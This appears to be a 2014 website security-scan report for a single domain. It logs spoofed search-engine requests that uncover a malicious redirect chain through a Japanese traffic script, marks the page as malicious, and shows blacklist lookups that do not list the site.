Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://vividxxx.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: vividxxx.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 23 Jun 2014 16:22:11 GMT Location: http://aug1969.sakura.ne.jp/saian/traf.php Server: Apache/2.2.25 Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://aug1969.sakura.ne.jp/saian/traf.php (imitation of visitor from search engine) GET /saian/traf.php HTTP/1.1 Host: aug1969.sakura.ne.jp Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Mon, 23 Jun 2014 16:22:12 GMT Location: http://localhost/ Server: Apache/2.2.25 Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://vividxxx.net/ | 200 OK Content-Length: 6114 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://vividxxx.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vividxxx.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vividxxx.net/
Result: vividxxx.net is not infected or malware details are not published yet.